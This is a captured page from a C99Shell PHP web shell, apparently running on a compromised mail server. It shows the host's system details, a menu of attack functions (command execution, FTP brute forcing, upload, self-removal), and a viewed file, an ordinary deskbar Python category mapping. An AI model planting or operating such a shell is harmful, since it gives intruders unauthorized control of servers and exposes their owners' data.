!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/pyshared/deskbar/core/   drwxr-xr-x
Free 129.99 GB of 142.11 GB (91.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Categories.py (1.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
from gettext import gettext as _
from deskbar.core.Utils import load_icon

CATEGORIES = {
    # Special categories
    "default"    : {    
        "name": _("Uncategorized"),
        "icon": load_icon("unknown"),
    },
    "history" : {
        "name": _("History"),
        "icon": load_icon("document-open-recent"),
    },
    
    # Standard handlers
    "documents"    : {    
        "name": _("Documents"),
        "icon": load_icon("empty"),
    },
    "emails"    : {    
        "name": _("Emails"),
        "icon": load_icon("emblem-mail"),
    },
    "conversations"    : {    
        "name": _("Conversations"),
        "icon": load_icon("system-users"),
    },
    "files"    : {    
        "name": _("Files"),
        "icon": load_icon("empty"),
    },
    "people"    : {
        "name": _("People"),
        "icon": load_icon("stock_people"),
    },
    "places"    : {    
        "name": _("Places"),
        "icon": load_icon("folder"),
    },
    "actions"    : {    
        "name": _("Actions"),
        "icon": load_icon("gnome-system"),
    },
    "web"    : {    
        "name": _("Web"),
        "icon": load_icon("gnome-globe"),
    },
    "websearch"    : {    
        "name": _("Web Search"),
        "icon": load_icon("web-search.png"),
    },
    "news"    : {    
        "name": _("News"),
        "icon": load_icon("dialog-information"),
    },
    "notes"    : {    
        "name": _("Notes"),
        "icon": load_icon("note.png"),
    },
    "audio"    : {    
        "name": _("Audio"),
        "icon": load_icon("audio-x-generic"),
    },
    "video"    : {    
        "name": _("Video"),
        "icon": load_icon("video-x-generic"),
    },
    "images"    : {    
        "name": _("Images"),
        "icon": load_icon("image-x-generic"),
    },
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0087 ]--